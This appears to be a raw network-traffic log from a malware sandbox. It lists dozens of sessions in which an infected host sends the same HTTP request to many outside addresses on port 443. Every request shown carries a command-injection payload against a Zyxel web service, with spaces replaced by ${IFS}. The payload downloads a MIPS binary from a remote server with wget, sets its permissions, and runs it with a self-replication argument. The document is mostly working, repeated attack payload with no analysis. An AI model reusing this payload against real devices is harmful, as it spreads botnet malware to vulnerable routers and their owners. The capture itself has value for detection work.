                                      Jan 14, 2024 15:50:47.317094088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4537192.168.2.1435666213.149.17.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317167044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4538192.168.2.145456287.148.141.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317226887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4539192.168.2.1437158164.180.166.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317281961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4540192.168.2.145764442.8.77.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317354918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4541192.168.2.1456730203.33.167.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317395926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4542192.168.2.144063098.99.219.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317452908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4543192.168.2.145540698.57.53.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317496061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4544192.168.2.1440532196.86.33.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317572117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4545192.168.2.1442740108.228.254.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317612886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4546192.168.2.1434876207.2.121.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317658901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4547192.168.2.144806471.106.244.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317715883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4548192.168.2.1449702130.135.43.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317763090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4549192.168.2.1454290184.1.238.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317792892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4550192.168.2.143857635.55.18.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317831993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4551192.168.2.1439150169.58.194.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317905903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4552192.168.2.145156298.168.108.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317925930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4553192.168.2.1453878144.16.147.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.317985058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4554192.168.2.143715283.160.196.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318032026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4555192.168.2.146067269.129.207.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318098068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4556192.168.2.1443114171.179.221.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318169117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4557192.168.2.1445652218.203.20.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318223953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4558192.168.2.1455438184.33.235.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318274021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4559192.168.2.1439360205.202.183.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318312883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4560192.168.2.1453226150.210.58.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318373919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4561192.168.2.146053097.14.21.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318440914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4562192.168.2.143632678.66.34.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318499088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4563192.168.2.1437118184.205.153.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318568945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4564192.168.2.143731220.51.209.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318619013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4565192.168.2.143765637.204.34.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318677902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4566192.168.2.1432796149.16.53.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318736076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4567192.168.2.143479443.242.167.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318793058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4568192.168.2.1451542111.169.140.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318840027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4569192.168.2.146085692.255.76.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318878889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4570192.168.2.143943290.49.34.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318945885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4571192.168.2.144831292.204.9.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.318989038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4572192.168.2.1436516186.218.52.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319057941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4573192.168.2.143656866.227.203.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319097996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4574192.168.2.145628017.106.23.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319155931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4575192.168.2.144373050.192.148.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319216967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4576192.168.2.1452344134.197.65.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319273949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4577192.168.2.1451844189.8.10.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319329977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4578192.168.2.1441180176.39.90.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319385052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4579192.168.2.145060288.37.175.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319441080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4580192.168.2.144410651.72.246.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319489956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4581192.168.2.144945240.225.77.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319550991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4582192.168.2.1444522178.149.118.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319581985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4583192.168.2.1438244100.56.197.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319623947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4584192.168.2.1452186107.10.50.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319700003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4585192.168.2.144924677.143.110.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319735050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4586192.168.2.1439474116.139.92.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319807053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4587192.168.2.144383263.242.84.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319845915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4588192.168.2.1443274144.82.35.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319874048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4589192.168.2.145447250.28.155.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.319938898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4590192.168.2.1434998107.79.230.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320008039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4591192.168.2.145262423.30.104.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320034981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4592192.168.2.144206276.52.36.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320070028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4593192.168.2.1448564111.115.142.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320152998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4594192.168.2.1445264112.172.18.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320198059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4595192.168.2.145530819.68.143.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320245028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4596192.168.2.1452136193.222.189.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320307970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4597192.168.2.1444314157.239.74.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320353985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4598192.168.2.1454426142.241.27.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320415974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4599192.168.2.1437216159.157.27.40443
                                      TimestampBytes transferredDirectionData
